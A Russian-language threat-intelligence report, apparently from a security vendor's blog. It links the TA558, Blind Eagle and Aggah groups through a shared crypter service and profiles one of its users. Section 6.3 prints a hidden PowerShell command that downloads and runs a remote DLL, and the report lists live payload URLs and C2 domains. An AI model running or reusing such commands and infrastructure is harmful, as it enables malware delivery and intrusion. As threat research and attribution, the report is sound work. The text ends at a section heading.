Как стать автором
Обновить
Positive Technologies
Лидер результативной кибербезопасности

Crypters And Tools. Часть 2: Разные лапы — один клубок

Уровень сложностиСредний
Время на прочтение27 мин
Количество просмотров329
Содержание

1. Ключевые находки

  • Как минимум, 6 публично известных группировок использовали Crypters And Tools

  • Часть из них связаны между собой, что мы показали в своём исследовании

  • Группировка Aggah, которая не упоминалась с 2022 года, до сих пор атакует пользователей по всему миру

  • Мы смогли установить некоторых пользователей Crypters And Tools

  • Часть установленных пользователей относятся напрямую к группам Blind Ealge и TA558 и являются их членами

2. Введение

В первой части мы рассказали о крипторе Crypters And Tools, который мы обнаружили в процессе исследования атак различных группировок. Отчет концентрировался на внутреннем устройстве и инфраструктуре самого криптора. В этой части мы расскажем о хакерских группировках, которые использовали его в атаках, их связях, уникальных особенностях, а также о пользователях Crypters And Tools, некоторые из которых связаны с рассматриваемыми группировками.

Также, исследование показало, что группировка Aggah продолжает совершать атаки, несмотря на то что некоторые исследователи считают 2022 концом активности группы.

Многие исследователи сталкивались с атаками с использованием Crypters And Tools, принимали особенности криптора (использование Ande Loader, переменная $codigo, сетевая инфраструктура криптора и так далее) за что-то уникальное и приписывали их к конкретным атакующим, что мы считаем ошибкой.  В конце статьи мы приложили все публичные отчеты, где упоминается Crypters And Tools или его ранние версии – Codigo-криптеры.

3. Группировки, использующие Crypters And Tools в атаках

TA558

Группа, активная с по крайней мере 2018 года, изначально нацелена на индустрию туризма в Латинской Америке, а также Западную Европу и США, но позже расширила свои атаки на другие регионы. Использует фишинг, стеганографию и вредоносное ПО, такое как Agent Tesla, FormBook и Loda RAT

Blind Eagle/APT-C-36

C 2018 года атакует Южную Америку, особенно Колумбию, а также Эквадор и Испанию. Применяет фишинг и вредоносное ПО такое как NjRAT, BitRAT, AsyncRAT, фокусируясь на государственных и корпоративных целях

Aggah/Hagga group

Предположительно пакистанская группа активная по крайней мере с 2018 года. Проводит фишинговые кампании против различных стран, в основном азиатские, то также была замечена за атаками на Латинскую Америку. Используют различные ПО, включая 3LOSH crypter, RevengeRAT и AgentTesla

PhaseShifters

Группа атакует государственные структуры России, Беларуси и Польши. Использует фишинг, стеганографию и репозитории (GitHub, BitBucket) для доставки вредоносных нагрузок, а также различные ПО, например Rhadamanthys

UAC-0050

Группа активная по крайней мере с 2020 года нацелена на украинские, польские и российские госструктуры. Рассылает фишинговые письма, маскируясь под официальные документы, распространяя в основном Remcos RAT, Quasar RAT и Remote Utilities

Phantom Control

С июля 2023 года использовали скомпрометированные сайты для распространения ScreenConnect, за которым следует AsyncRAT. В какой-то момент перешли на Ande Loader для доставки SwaetRAT. Возможно, связаны с Blind Eagle

Таблица 1. Группировки, использующие Crypters And Tools

Blind Eagle

TA558

Aggah

PhantomControl

PhaseShifters

UAC-0050

География атак

Латинская Америка: Колумбия, Эквадор, Чили, Панама, Бразилия

Латинская Америка, Северная Америка, Западная Европа

Латинская Америка, Северная Америка, Западная Европа, Ближний Восток, Восточная Азия

N/A

Россия, Беларусь, Польша

Россия, Беларусь, Польша, Украина, Молдова, страны Балтии

Используемое ВПО

Remcos RAT, Async RAT, njRAT, Quasar RAT, BitRAT, LimeRAT 

Remcos RAT, Async RAT, Xworm, Lokibot, FormBook, Agent Tesla, Revenge RAT 

Rhadamanthys, XWorm, Agent Tesla, Remcos RAT, Warzone RAT, nanocore RAT, njRAT, AzoRult, Lokibot, Revenge RAT

Async RAT, SwaetRAT, ScreenConnect (Remote Access Software)

Rhadamanthys, DarkTrack RAT, Meta Stealer

Remcos RAT, Meduza Stealer, Lumma Stealer, Quasar RAT

Язык писем и документов

Испанский, порту-гальский

Испанский, английский, могут использовать языки атакуемых регионов  

Английский, испанский, могут использовать языки атакуемых регионов  

N/A

Русский 

Украинский, русский, румынский, английский

Использование САТ

2023-2025

2023-2025

2021-2023 

2023

2024 

2024 

Таблица 2. Сводная таблица о группировках, использующих Crypters And Tools

В данной статье мы сосредоточены на трёх группировках: TA558, Blind Eagle и Aggah, а также на пользователях Crypters And Tools, которые могут быть с ними связаны. Для наглядности продемонстрируем часть связей между этими группами в следующей таблице:

Aggah

Blind Eagle

TA558

• Периодическое использование строки «cdt» на протяжении всех атак

• Атаки на отели в 2018 году

• Сходство в использовании ВПО и крипторов (3LOSH, Crypters And Tools)

• Похожий код скриптов в атаках в 2024 году

• Использование общей инфраструктуры CryptersAndTools (servidorwindows.ddns.com.br)

• Основная география атак – Латинская Америка

• Использование в фишинге испанского языка

• Похожий инструментарий (Asyncrat, Remcos и т.д.)

Aggah

N/A

· Использование общей инфраструктуры CryptersAndTools (149.56.200.165)

· Исследователи, упоминали, в своём репорте, что возможно группа Aggah – это подгруппа Blind Eagle

Таблица 3. Пересечение между группами

Все три группы до сих пор активны и совершают множество атак. Aggah в данный момент прекратила использовать Crypters And Tools или или их атаки находятся вне зоны нашего наблюдения. При этом сама группа активна, и мы расскажем об этом в соответствующем разделе.

В это же время, ТА558 и Blind Ealge до сих пор активно пользуются криптором.

Например, в мартовской статье Check Point Research рассказали про атаки группировки Blind Eagle. Мы наблюдали описанную атаку в феврале, и тогда нас привлек IP 62.60.226[.]64, который Check Point тоже указали в качестве индикатора. На нём располагалось множество файлов, связанных Crypters And Tools, хотя в конкретной атаке криптор мог не использоваться.

Про атаки Blind Eagle мы также расскажем ниже в разделе про пользователей Crypters And Tools под никами deadpoolstart2025 и ABBAS и их связь с данной группой.

В случае с TA558 примером атаки с использованием Crypters And Tools может послужить фишинговая атака в марте, где использовался следующий файл:

  • Purchase Inquiry.xla (SHA-256: 55ea07bbd700488fd6330d289f210b2da119401a9e27009472d1afec2f6c6339)

В атаке фигурировали типичные для TA558 URL:

Пользователи Brainiac, syscore и negrocock, связанные с TA558, также будут упомянуты в соответствующем разделе.

Отметим, что TA558 и Blind Ealge не ограничиваются использованием только Crypters And Tools в своих атаках. Например, в апреле 2025 мы обнаружили типичное письмо TA558:

Рисунок 1. Пример письма TA558
Рисунок 1. Пример письма TA558

Письмо содержало два вредоносных документа, которые скачивали вредоносную нагрузку с сервера с узнаваемым для ТА558 паттерном:

http://216.9.224.185/33/eco/goodthingsforbestfeaturesgivenmegoodthingsforbest_______________goodthingsforbestfeaturesgivenme_____________goodthingsforbestfeaturesgivenme.doc

Далее скачивался и выполнялся goodthingsforbestfeaturesgivenme.vbe, что приводило к заражению жертвы вредоносным ПО Remcos. Crypters And Tools в данной атаке не использовался.

4. PhaseShifters, UAC-0050 и PhantomControl

В первой части мы уже рассказывали, что вышли на сам Crypters And Tools, когда исследовали группировки PhaseShifters и UAC-0050. Пересечения между этими группировками описаны в одной из наших статей, поэтому мы не будем концентрироваться на этих группах, но отметим, что не обнаружили их явной связи с создателями самого криптора. Предположительно, они приобрели подписку.

Про группу PhantomControl есть только два отчета от компании Esentire. В первом отчете Crypters And Tools не фигурировал, но во втором группа стала использовать Ande Loader. В отчете данное ВПО было атрибутировано к группе Blind Eagle, но Ande Loader используется в Crypters And Tools, поэтому прямая атрибуция некорректна. Так, например, ссылки на paste.ee и картинки, указанные в статье, принадлежат криптору. Поэтому можно точно сказать, что группа использовала Crypters And Tools в своих атаках, но дополнительной информацией о PhantomControl мы не располагаем.

5. Особенности группы TA558 и ее отличия от инфраструктуры Blind Eagle

В статьях, где исследователи сталкивались с Crypters And Tools часто возникали ложные связи между группировками из-за отсутствия ранее информации о том, что данный криптор – это отдельная сущность, а не уникальный инструмент какой-то группировки. Примером может служить отчет исследователей из Qi An Xin 2023 года, где они предполагают, что группа Aggah может быть подгруппой Blind Eagle, основываясь на значительном сходстве TTP, частичном пересечении вредоносного ПО, географически близким целям и т.д. Мы не исключаем эту возможность, но в предыдущем исследовании мы объяснили упомянутые в статье пересечения использованием Crypters And Tools. Тем не менее, при детальном анализе поздних стадий атак отличия TA558 и Blind Eagle начинают проявляться.

В данном разделе мы укажем некоторые особенности TA558 и Blind Eagle, которые позволяют нам их различать. Эти данные позволят нам найти связи между данными группами и некоторыми пользователями Crypters And Tools в соответствующем разделе.

5.1 Характерные URL и имена файлов TA558

В атаках TA558 часто встречаются паттерны URL, которые мы не связываем с Crypters And Tools:

  • 103.67.162.213/xampp/gd/kissingagirlissoeasyrecentlyireallyfeelsheismygirlineverwanttohurtherweneverwantotkissher_______ilovehertrulyfromtheheartiloveyou..doc

  • 172.232.175.155/88122/bh/bh.h.h.h.hhhhh.doC

  • 172.234.239.22/990099/gf/l.c.c.c.ccx.doC

Также среди вредоносных файлов TA558 было множество повторяющихся имен и паттернов. Примеры типичных имен файлов ниже:

  • PO-24052800.xls

  • factura 00005111, 005114, 005115.pdf.xlam

  • Orden de compra 4000171682.docx

Вышеуказанные имена относительно уникальны, но стоит отметить, что всё же мы видели подобные названия у одного злоумышленника – bukky101, о котором будет сказано далее.

5.2 Характерные домены TA558

ТА558, Blind Eagle и Aggah используют различные динамические DNS сервисы, такие как duckdns.org, 3utilities или us.archive.org. В большинстве случаев эти домены являются доменами Crypters And Tools. Например URL, который мы указывали в качестве инфраструктуры TA558 в одной из версий Crypters And Tools появился внутри самого криптора:

  • http://servidorwindows.ddns.com.br/Files/js.jpeg

Рисунок 2. URL из отчета о TA558, прописанный внутри криптора
Рисунок 2. URL из отчета о TA558, прописанный внутри криптора

При этом в атаках мы встречали использование доменов, очень похожих на домены TA558, и файлов с характерными длинными именами, которые при этом не присутствуют внутри самого Crypters And Tools. Ниже приведены такие домены с повторяющимися буквами внутри названий дней недели:

  • mondayyyyvbsgreeceee.duckdns.org

  • wednesdayyyyyyfile.duckdns.org

  • thursdayyyyyyfileeee.duckdns.org

  • fridayyyyvert.3utilities.com

5.3 Различия в инфраструктуре TA558 и Blind Eagle

 Blind Eagle использует преимущественно колумбийские ASN, в то время как у TA558 этого замечено не было. Ниже представлена таблица, которая показывает популярные ASN у групп, а также примеры IP-адресов из этих ASN, атрибутированных к TA558 и Blind Eagle.

Группа

Топ ASN группы

Пример IP адресов

Blind Eagle

Colombia Movil

179.15.149.222

191.88.255.30

181.134.151.81

181.131.216.73

181.52.105.166

Telmex Colombia

Tigo – UNE

TA558

AS-COLOCROSSING

192.210.150.33

107.172.148.248

104.168.7.36

149.28.237.172

172.234.217.133

Akamai Connected Cloud

AS-VULTR

Таблица 4. Инфраструктура злоумышленников

6. Aggah. Новые атаки и связь с TA558

Aggah (Hagga) – это хакерская группировка, нацеленная на кражу информации и проводящая фишинговые кампании по всему миру. Среди распространяемого ВПО – RevengeRAT, Agent Tesla, Nanocore RAT, Warzone RAT, NjRAT, AzoRult и другое. Особый элемент в их цепочке атаки – частое использование serverless инфраструктуры для размещения вредоносной нагрузки, к примеру, Blogspot, Pastebin или WebArchive. В 2018 году на сайте FreeBuf вышла статья, в которой раскрывается предполагаемая личность, стоящая за группировкой. На основе этой статьи можно утверждать, что участники группы Aggah могут происходить из Пакистана.

Ниже показаны некоторые взаимосвязи между группировками TA558 и Aggah на основе открытых источников и прошлых кампаний злоумышленников. Однако для того, чтобы утверждать, что это одна и та же группировка, необходимо провести дополнительное исследование. На данном этапе можно предполагать о том, что Aggah поддерживает связь с TA558, обмениваясь идеями для атак, используемым ВПО и другими инструментами.

Чтобы проиллюстрировать связь Aggah и TA558 нам придется углубиться в первые атаки Aggah, которые описывались до получения группировкой своего имени.

6.1 Первые упоминания Aggah

Первые атаки группировки можно заметить в 2018 году – вредоносные кампании Roma225 и Operation Commando. Атрибуция этих вредоносных кампаний к группировке показана далее.

6.1.1. Атаки 2018 года

 Анализ вредоносной кампании Roma225, вышел в декабре 2018 года от компании Yoroi. В этой кампании исследователи описали распространение RevengeRAT через PowerPoint-документы с использованием сервиса Blogspot. Из данной статьи стоит запомнить несколько важных фактов:

  • Метаданные распространяемого документа (автор C.D.T Original)

  • Использование словосочетания «CDT» в переменных кода

Рисунок 3. Метаданные распространяемого документа
Рисунок 3. Метаданные распространяемого документа
Рисунок 4. Вредоносный скрипт с переменными "CDT" (Источник: отчет компании Yoroi)
Рисунок 4. Вредоносный скрипт с переменными "CDT" (Источник: отчет компании Yoroi)

На тот момент Aggah еще не получили своё имя, но пока отметим, что TA558  впервые упоминается компанией Proofpoint в том же 2018 году. Более того, эксперты в исследовании упоминают те же метаданные и сетевые индикаторы компрометации, что были в компании Roma225: автор документа “C.D.T Original” и домен cdtmaster[.]com, однако никакой взаимосвязи между Roma225 и TA558 не было отмечено.

Рисунок 5. Упоминание метаданных в статье Proofpoint
Рисунок 5. Упоминание метаданных в статье Proofpoint
Рисунок 6. Упоминание вредоносного домена в статье Proofpoint
Рисунок 6. Упоминание вредоносного домена в статье Proofpoint

6.1.2. Атаки 2019 года

В марте 2019 года от Unit42 вышла статья про Operation Сomando направленную на отели. Описываемая кампания имеет ряд сходств с кампанией Roma225, которые показаны в таблице ниже. На основе указанных пересечений можно сделать вывод, что обе описываемые кампании принадлежат одной и той же хакерской группировке, которая также на тот момент пока не получила название Aggah.

Unit42 – Operation Comando

Yoroi – Roma225 Campaign

Dropurls

minhacasaminhavidacdt.blogspot[.]com

minhacasaminhavidacdt.blogspot[.]com

internetexplorer200[.]blogspot[.]com

pocasideiascdt.blogspot[.]com

 

cdtmaster[.]com.br

C2

systenfailued.ddns[.]com[.]br

systen32.ddns[.]net

office365update[.]duckdns[.]org

office365update[.]duckdns.org

cdtoriginal[.]ddns[.]net

 

Таблица 6. Сравнение доменов из двух кампаний

В 2019 году атаки на отели продолжались и от TA558, но явных пересечений между описываемыми атаками нет.

6.1.3. Hagga (Aggah). Рождение названия группировки

В апреле 2019 года Unit42 выпускают статью, которую называют "Aggah Campaign”. В данном исследовании описывались атаки с использованием ВПО RevengeRAT и легитимных сервисов Pastebin, Blogspot, Bit.ly. Тогда вредоносная кампания получила свое название из-за используемого слова “hagga” в конфигурации ВПО. Такую же строчку содержало и имя пользователя на сайте Pastebin. Но главное в этой статье – показанные в ней пересечения с прошлым исследованием:

  • Название мьютекса с допущенной ошибкой в слове “System32” - RV_MUTEX-WindowsUpdateSysten32

  • Использование ключей “oldman”, “steve”, “hagga”, “roma225” в конфигурации RevengeRAT

  • Сетевые индикаторы из предыдущих атак: office365update.duckdns[.]org, systen32.ddns[.]net

Рисунок 7. Конфигурация RevengeRAT с ключом "hagga" (Источник: отчет компании Unit42)
Рисунок 7. Конфигурация RevengeRAT с ключом "hagga" (Источник: отчет компании Unit42)

Таким образом, именно Aggah стояли за Roma225 и Operation Comando.

Один из самых интересных фактов – использование идентификатора “HOTEIS NOVOS” (“NEW HOTELS” в переводе с португальского) в атаках.  Этот момент примечателен тем, что группа ТА558 в это же время проводила атаки на отели с вредоносными письмами и документами также на португальском.

Рисунок 8. Конфигурация RevengeRAT с португальским идентификатором (Источник: отчет компании Unit42)
Рисунок 8. Конфигурация RevengeRAT с португальским идентификатором (Источник: отчет компании Unit42)

6.1.4. Атаки 2020-2022 годов

В 2019 – 2021 годах Aggah распространяли AzoRult, используя свою панель управления - ManaTools. Слово «mana» часто будет встречаться – в авторах документов и доменах. В одном из следующих разделов мы покажем потенциальную связь между Aggah и Crypters And Tools, основываясь в том числе на этом факте.

Рисунок 9. Панель управления ManaTools
Рисунок 9. Панель управления ManaTools

Примеры доменов, используемые группировкой Aggah в 2019 году:

  • mastermana1.serveirc[.]com

  • mastermana2.serveirc[.]com

  • mastermana3.serveirc[.]com

  • mastermana4.serveirc[.]com

  • mastermana5.serveirc[.]com

Рисунок 10. Метаданные из вредоносных документов в атаках Aggah
Рисунок 10. Метаданные из вредоносных документов в атаках Aggah

За период 2020-2022 года мы заметили следующие интересные связи между TA558 и Aggah:

  • Схожая география атак: Латинская Америка и Западная Европа; похожий набор ВПО, к примеру, обе группы использовали Remcos RAT, RevengeRAT и AzoRult.

  • В 2021 году адрес 3.218.4.249 использовался обеими группами для размещения вредоносной нагрузки.

  • Обе группы в своих доменах используют аббревиатуру C.D.T:

    • warzonecdt[.]duckdns[.]org (ТА558, источник: Proofpoint)

    • ccnewcdt[.]duckdns[.]org (Aggah, один из доменов, который резолвился в 192.154.226[.]47, источник: Team Cymru)

  • Общие метаданные и сходства в макросах вредоносных документов.

Рисунок 11. Код макросов документов TA558 (справа) и Aggah (слева)
Рисунок 11. Код макросов документов TA558 (справа) и Aggah (слева)
Рисунок 12. Авторы встроенных OLE-объектов TA558 (справа) и Aggah (слева)
Рисунок 12. Авторы встроенных OLE-объектов TA558 (справа) и Aggah (слева)

6.2 Атаки 2023-2025 годов

Несмотря на то, что по публичным отчетам активность Aggah не проявлялась в конце 2022 года, мы нашли некоторые данные, позволяющие предположить, что группировка была активна и все еще продолжает свою деятельность.

В ходе поиска новой активности группировки мы нашли файлы, которые по стилю кода и характерным признакам напомнили предыдущие атаки Aggah. Дальнейшее исследование показало, что они связаны с фишинговой кампанией meme#4chan, описанной в отчете Securonix в 2023 году. Хотя в отчете эта кампания не была атрибутирована к конкретной группировке, обнаруженные нами совпадения позволяют предположить, что за ней стоял именно Aggah.

При сравнении атак обнаружилось несколько ключевых признаков, характерных для прошлых операций Aggah:

  • Тематика писем – гостиничный бизнес и туристическая сфера. Несмотря на популярность этой темы в фишинге, Aggah неоднократно использовали ее ранее. Более того, названия документов встречались как на английском, так и на португальском (аналогично атакам 2019 года).

  • Использование serverless-инфраструктуры: blogspot, mediafire, usrfiles.

  • Стиль кода: во многих атаках код, похоже, писался вручную, с нестандартными, порой ироничными названиями переменных, а также с использованием слов на языке урду. Этот момент важен, так как выше мы уже указывали на возможное пакистанское происхождение участников группы Aggah.

Особый интерес вызывает один из powershell-скриптов, в котором присутствует переменная $ALLSAVEBACKUP, содержащая ссылку на Blogspot-страницу backuphotelall.blogspot[.]com, а также характерный комментарий, который будет повторяться в дальнейших атаках Aggah.

Рисунок 13. Часть powershell-скрипта (Источник: отчет компании Securonix)
Рисунок 13. Часть powershell-скрипта (Источник: отчет компании Securonix)
Рисунок 14. Комментарий (Источник: отчет компании Securonix)
Рисунок 14. Комментарий (Источник: отчет компании Securonix)

Этот Blogspot использовался для загрузки вредоносных файлов, которые затем можно было найти и на других Blogspot-страницах, а также в хранилищах Bitbucket. Одним из таких файлов был all.txt, доступный по следующим ссылкам:

https://bitbucket[.]org/!api/2.0/snippets/nikkerkhan/5qkMXX/c193c8cd66ad1405f4a0ebc7293d71d0f287eb98/files/all.txt

https://backuphotelall.blogspot[.]com/atom.xml

https://otherbusinesssep23.blogspot[.]com/atom.xml

https://backupalllogsmay23.blogspot[.]com/atom.xml

https://hotelbackuppowaug.blogspot[.]com/atom.xml

https://otherbizzunus.blogspot[.]com/atom.xml

По ним можно найти атаки после meme#4chan кампании. К примеру, страница hotelbackuppowaug.blogspot[.]com использовалась в файле lnvoice 1882936796.js, чей код имел схожие комментарии с предыдущими атаками. (Полный разбор можно посмотреть на AnyRun)

Рисунок 15. Атака Aggah с использованием Agent Tesla
Рисунок 15. Атака Aggah с использованием Agent Tesla
Рисунок 16.1. Часть powershell-скрипта из атаки (сентябрь 2023)
Рисунок 16.1. Часть powershell-скрипта из атаки (сентябрь 2023)
Рисунок 16.2. Часть powershell-скрипта из атаки (февраль 2023)
Рисунок 16.2. Часть powershell-скрипта из атаки (февраль 2023)

Исследование подобных атак привело нас к кампании, начавшейся в конце 2023 года. В этот период Aggah начали распространять вредоносные файлы на тему налогов или счетов, содержащие XWorm или Agent Tesla. Использование blogspot и bitbucket сохранилось, а код скриптов изменился не существенно.

Пример файла из этой кампании: Robert_Michael_Tax_2023.js. Этот обфусцированный javascript файл обращается к хранилищу BitBucket kimkardaikehsi и загружает Agent Tesla. Можно заметить схожесть кода с предыдущими примерами.

Рисунок 17. Часть powershell-скрипта из атаки (июнь 2024)
Рисунок 17. Часть powershell-скрипта из атаки (июнь 2024)

А в сетевых индикаторах можно увидеть использование словосочетания “CPA” и “mana”:

manablack.duckdns[.]org

cpamay2024.duckdns[.]org

cpanewminemay24.duckdns[.]org

В 2025 году атаки Aggah продолжаются, но основной вредоносной нагрузкой теперь стали Rhadamanthys и XWorm. Типичная цепочка заражения начинается с обфусцированного javascript файла (названия часто связаны с налоговой тематикой или формами отчетности), который в итоге приводит к выполнению следующего PowerShell-кода:

Рисунок 18. PowerShell-код, выполняющийся после открытия JavaScript-файла
Рисунок 18. PowerShell-код, выполняющийся после открытия JavaScript-файла

При обращении к Blogspot происходит редирект на bitbucket, откуда загружается финальный powershell-скрипт, устанавливающий вредоносное ПО на устройство жертвы. Стоит отметить, что в некоторых случаях перед загрузкой вредоносной нагрузки происходит дополнительная проверка геолокации, что позволяет атакующим подбирать соответствующие версии вредоносных программ в зависимости от региона. Примеры заражений с использованием XWorm и Rhadamanthys можно найти в отчетах AnyRun.

Рисунок 19. Проверка геолокации
Рисунок 19. Проверка геолокации

6.2.1. Очередные пересечения Aggah с TA558

 В 2024 году исследователь IdaNotPro опубликовал разбор одного из файлов, использованных в атаках TA558, под заголовком «TA558 Targeting Brazil». В кампании вновь фигурировали фишинговые письма и вредоносные документы, связанные с гостиничным бизнесом, а также C2-домены с cdt — элемент, который встречается в инфраструктуре как TA558, так и Aggah.

При сравнении разбираемого исследователем файла с атаками Aggah, мы нашли некоторые интересные совпадения. Вот несколько основных сходств:

  • Стадия с powershell-скриптом, скачиваемым с detail-booking.com[.]br похожа на таковую в атаках Aggah. Например, использование функции kimkarden у ТА558, а со стороны Aggah – BitBucket kimkardaikeshi. Кроме того, если сравнить код, можно заметить определенные схожести:

Рисунок 20. Слева код Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), справа код TA558 (MD5: c90688783f910b2b4165e2263012e19b)
Рисунок 20. Слева код Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), справа код TA558 (MD5: c90688783f910b2b4165e2263012e19b)
  • Некоторые файлы, связанные с доменом detail-booking.com[.]br, использовавшимся ТА558, имели похожие на Aggah названия:

Рисунок 21. Связанные с доменом detail-booking.com[.]br файлы
Рисунок 21. Связанные с доменом detail-booking.com[.]br файлы
  • В конфигурации одного из файлов, общающихся с итоговым C2 доменом cdt2023.ddns.net из атаки TA558, были обнаружены строки, содержащие текст «CPA», что является одной из отличительных характеристик атак Aggah.

Рисунок 22. Конфигурация одного из файлов (tria.ge)
Рисунок 22. Конфигурация одного из файлов (tria.ge)

Сравнение атак Aggah с кампаниями TA558, несмотря на сходства в инфраструктуре и методах, не позволяет однозначно утверждать, что это одна и та же группировка. Тем не менее, оно демонстрирует, что группировки могут обмениваться инструментами, идеями и ресурсами.

6.3 Использование Crypters And Tools группой Aggah

В разделе про атаки Aggah 2020-2022 мы упоминали использование группой ManaTools.

В 2021 году Aggah начали использовать 3LOSH Crypter и FsocietyAndTools – одну из более ранних версий CryptersAndTools. При анализе атак за 2021 и 2022 год мы заметили несколько интересных деталей, указывающих на связь Aggah и codigo-крипторов. Например, обнаруженный нами IP-адрес 198.50.177[.]251 использовался как хостинг для нескольких ресурсов, включая директорию “mastermana”, содержащую файлы для атак группы Aggah, а также учетную запись, принадлежащую разработчику криптора nodetecton (использовалась в цепочке запуска криптора).

-windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://nodetecton@198.50.177.251/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.85618406295/anamretsam/152.771.05.891//:ptth'))"

Помимо этого, как было сказано раннее, в 2019 – 2021 годах исследователи заметили использование разработанной Aggah панели управления в атаках группы – Mana Tools. В атаках 2022 года была обнаружена атака с использованием ВПО XWorm, где в качестве C2 использовался Telegram-бот, с которым коммуницировал аккаунт @mastermana.

Рисунок 23. Telegram-аккаунт Mastermana
Рисунок 23. Telegram-аккаунт Mastermana

Поиск упоминаний Telegram-аккаунта приводит к Youtube-каналу “Tiny Technology”, на котором содержатся демонстрационные видеоролики работы различных эксплойтов. На большинстве видеороликов используется логотип Mana Tools, но есть более интересные детали из данных видеороликов:

  • Имена пользователей на компьютере и виртуальных машинах (Master MANA, 007 и другие)

  • Использование репозитория hogya в BitBucket, который фигурировал до этого в атаках Aggah (рисунок 23)

  • Интерфейс криптора CryptersAndTools, на котором присутствуют логотипы обоих инструментов, что наводит на мысли о возможной связи или коллаборации (рисунок 24)

  • Присутствие CryptersAndTools на системе злоумышленника в 2023 году (рисунок 25)

Рисунок 24. Создание файла в репозитории hogya (скриншот видеодемонстрации)
Рисунок 24. Создание файла в репозитории hogya (скриншот видеодемонстрации)
Рисунок 25. Совместная работа с CryptersAndTools (скриншот видеодемонстрации)
Рисунок 25. Совместная работа с CryptersAndTools (скриншот видеодемонстрации)
Рисунок 26. Использование Aggah CryptersAndTools в 2023 году (скриншот видеодемонстрации)
Рисунок 26. Использование Aggah CryptersAndTools в 2023 году (скриншот видеодемонстрации)

7. Пользователи Crypters And Tools и их связи с группировками

Как было сказано в первой части, максимальное число активных пользователей криптора, которое мы обнаружили, было 42 на момент 26 ноября 2024 года. При этом стоит отметить, что в списке присутствовали администраторы сервиса, пользователи с разными никами, но одинаковым HardwareID, а также тестовые пользователи. То есть реальное количество активных подписчиков криптора было меньше.

Среди них мы нашли несколько интересных пользователей.

7.1 bukky101

В базе данных нас заинтересовал следующий пользователь:

Рисунок 27. Информация из базы данных о пользователе bukky101
Рисунок 27. Информация из базы данных о пользователе bukky101

Про этого пользователя рассказывали Esentire в своей статье, посвящённой фишинговым атакам с использованием Ande Loader, который приводил к заражению стиллером 0bj3ctivity. В статье исследователи рассказали, что после заражения данные отправлялись в телеграм бота. Владельцем бота был юзер bukky101. С учётом всех текущих знаний, мы понимаем, что в приведённой статье bukky101 использовал Crypters And Tools.

Мы проанализировали этого пользователя и его атаки. Например, в мае 2024 года злоумышленник использовал в атаке AgentTesla (SHA-256: 5a8794fa12ff401f9f7212e497d5d877010f493e3bb028abd54cb12f60fc550f). Данные отправлялись на SMTP сервер злоумышленника boydjackson[.]org. Интересно, что злоумышленник использовал пароль Bukky101@. Одну из таких атак исследователи подробно расписали в своей статье.

Во время исследования мы обнаружили множество жертв в разных странах, которые подверглись атаке. Список стран следующий: Армения, Греция, Индия, Ирак, Италия, Кипр, Колумбия, Малайзия, ОАЭ, Пакистан, Саудовская Аравия, Сингапур, Турция. 

Жертвы были из совершенно разных отраслей и какого-то общего паттерна в том, кого атаковал Bukky101, видно не было.

В одной из атак злоумышленник запустил вредоносное ПО на своей системе, это позволило получить полезную информацию, включая:

  • буфер обмена

  • установленные приложения

  • информацию об системе, включая IP, наличие антивирусов, эмуляторов и песочниц

  • ключи windows

  • историю браузеров

  • историю скачиваний

  • топ посещённых сайтов

  • информацию о сессиях, например Telegram и Skype

  • Списки wifi с именами и паролями

Таким образом, мы точно выяснили, что злоумышленник Bukky101 из Нигерии. Об этом говорит не только IP, но и использование Airtel Nigeria.

Помимо этого, мы обнаружили, что хакер массово посылал письма в различные страны. На момент февраля 2025 года, злоумышленник послал более 6160 различных писем в разные страны. Приведём несколько примеров названий таких писем и различие тем фишинга:

  • DETAIL OF H Sale order # 128578 (PAKISTAN.PACKAGES)

  • Position for the Head of IT / Manager IT

  • Прайс лист на продукцию

  • محاكم راس الخيمة إعلان:3100134384

  • [Gabrini Cosmetics]: New order #80464

  • Re: Proposal of Stall Design and Fabrication for AAHAR Expo 04-08 March 2025 (New delhi)

  • ✅ Нов термин за работилница: Последни измени на Законот за јавни набавки, актуелни теми и предизвици

  • Atașez și poze cu , coletul ce mi-a ajuns , și factura lângă

  • Factura fiscala cutii carton_22.11.2024

  • Dit verandert er in de tarieven en voorwaarden op ons platform

  • REQUEST FOR PROPOSAL FOR WORLD VISION ZIMBABWE

Рисунок 28. Пример письма от bukky101
Рисунок 28. Пример письма от bukky101

Большинство писем содержали html с уже введенным логином потенциальной жертвы. Как только пользователь вводил пароль в форму, то выдаёт ошибку, что пароль не действителен, а в тоже время посылается запрос в телеграм бот, но принадлежащий уже другому пользователю - @Gfcafmin.

Рисунок 29. HTML-документ с введённым логином bukky101
Рисунок 29. HTML-документ с введённым логином bukky101

Также мы обнаружили открытую директорию, принадлежащую пользователю bukky101 с IP 37.49.228.234, которая упоминалась в соцсети X.

Рисунок 30. Открытая директория сервера 37.49.228.234 принадлежащая bukky101
Рисунок 30. Открытая директория сервера 37.49.228.234 принадлежащая bukky101

Во время исследования bukky101 мы обнаружили, что он сотрудничает с множеством людей из теневого сообщества. Так, один из тех, кто сотрудничал с bukky101 использовал сервер 185.38.142.224, для отправки вредоносных email по всему миру. По нашим данным с этого IP было отправлено по крайней мере 60300 писем в течение суток.

Одно из таких писем выглядело следующим образом:

Рисунок 31. Вредоносное письмо от одного из сообщников bukky101
Рисунок 31. Вредоносное письмо от одного из сообщников bukky101

При нажатии на ссылку, происходит скачивание JS файла со следующего сайта:

  • https://21ninety.info/file/Purchase-Order.js

Этот скрипт скачивал данные с paste.ee, а затем обращался через API на сервер CryptersAndTools для получения дальнейшей нагрузки:

  • 3005.filemail.com/api/file/get?filekey=

В последствии данные выгружались в телеграм бот, принадлежащий пользователю To The World Master Solution - @Mastersolution2.

У нас есть гипотеза, что bukky101 может быть связан с одной из группировок Aggah, TA558 и Blind Eagle, но данных для однозначного вывода пока недостаточно.

Помимо этого, ранее исследователи писали о связях группировки Aggah и нигирийских хакерах. В статье говорилось, что нигирийские хакеры заимствовали инструментарий для атак у групп из Пакистана, а именно – у Aggah, что частично соотносится с описанными выше фактами.

7.2 Blind Eagle: deadpoolstart2025 и abbas

